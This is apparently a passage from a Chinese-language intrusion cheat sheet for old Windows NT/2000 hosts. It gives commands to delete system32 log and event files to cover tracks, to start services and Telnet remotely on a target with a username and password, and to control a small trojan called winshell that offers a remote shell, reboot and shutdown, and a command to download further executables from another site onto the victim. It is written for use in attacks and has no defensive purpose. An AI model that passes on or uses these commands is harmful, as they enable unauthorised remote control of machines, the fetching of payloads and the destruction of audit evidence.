掃尾：

del C:/winnt/system32/logfiles/*.*

del C:/winnt/ssytem32/config/*.evt

del C:/winnt/system32/dtclog/*.*

del C:/winnt/system32/*.log

del C:/winnt/system32/*.txt

del C:/winnt/*.txt

del C:/winnt/*.log

一、netsvc.exe

下面的命令分別是列出主機(jī)上的服務(wù)項(xiàng)目、查尋和遠(yuǎn)程啟動(dòng)主機(jī)的“時(shí)間任務(wù)”服務(wù)：

netsvc /list //IP地址

netsvc schedule //IP地址 /query

netsvc //IP地址 schedule /start

二、OpenTelnet.exe

遠(yuǎn)程啟動(dòng)主機(jī)的Telnet服務(wù)，并綁定端口到7878，例如：

OpenTelnet //IP地址 用戶名 密碼 1 7878

然后就可以telnet到主機(jī)的7878端口，進(jìn)入DOS方式下：

telnet IP地址 7878

三、winshell.exe

一個(gè)非常小的木馬（不到6K），telnet到主機(jī)的7878端口，輸入密碼winshell，當(dāng)看到CMD后，可打下面的命令：

p Path （查看winshell主程序的路徑信息）

b reBoot （重新啟動(dòng)機(jī)器）

d shutDown （關(guān)閉機(jī)器）

s Shell （執(zhí)行后你就會(huì)看到可愛的“C:/”）

x eXit （退出本次登錄會(huì)話，此命令并不終止winshell的運(yùn)行）

CMD http://.../srv.exe （通過http下載其他網(wǎng)站上的文件到運(yùn)行winshell的機(jī)器上）